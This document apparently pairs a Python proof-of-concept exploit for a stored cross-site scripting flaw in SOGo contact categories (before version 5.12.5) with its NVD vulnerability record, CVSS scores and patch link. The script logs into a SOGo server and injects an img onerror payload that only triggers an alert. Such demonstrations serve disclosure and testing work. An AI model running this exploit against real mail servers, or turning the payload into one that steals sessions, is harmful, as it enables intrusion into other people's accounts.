CVE-2025-71276

import requests # Proof of Concept for CVE-2025-71276 # Target: SOGo < 5.12.5 # Vulnerability Type: Stored XSS in Event/Task/Contact Categories target_url = "http://target-sogo-domain/SOGo/so/user/Contacts/" login_url = "http://target-sogo-domain/SOGo/connect" session = requests.Session() # 1. Authenticate (Adjust credentials as needed) login_data = { "userName": "attacker", "password": "password", "language": "en", "noCookies": "0" } session.post(login_url, data=login_data) # 2. Prepare Malicious Payload # Injecting script into the category field xss_payload = '<img src=x onerror=alert("CVE-2025-71276-XSS")>' # 3. Create Contact with Malicious Category contact_headers = { "Content-Type": "application/json", "Accept": "application/json" } # Simulating API call to add a contact contact_data = { "c_name": "Test Contact", "c_givenname": "Test", "c_sn": "User", "categories": xss_payload, # Vulnerable parameter "tel_cell": "123456789" } try: response = session.post(target_url, json=contact_data, headers=contact_headers) if response.status_code == 200: print("[+] Payload injected successfully!") print("[+] Check the Contacts page to trigger the XSS.") else: print(f"[-] Failed to inject. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

{"cve": {"id": "CVE-2025-71276", "sourceIdentifier": "[email protected]", "published": "2026-03-22T03:16:00.233", "lastModified": "2026-03-23T19:47:35.633", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SOGo before 5.12.5 is prone to a XSS vulnerability with events, tasks, and contacts categories."}, {"lang": "es", "value": "SOGo anterior a 5.12.5 es propenso a una vulnerabilidad XSS con las categorías de eventos, tareas y contactos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.12.5", "matchCriteriaId": "6300FA4D-5A77-4117-ACF1-11F319436E3D"}]}]}], "references": [{"url": "https://github.com/Alinto/sogo/commit/e9b3f2a43d7557e8416f6749df4ab4f9128af2d1", "source": "[email protected]", "tags": ["Patch"]}]}}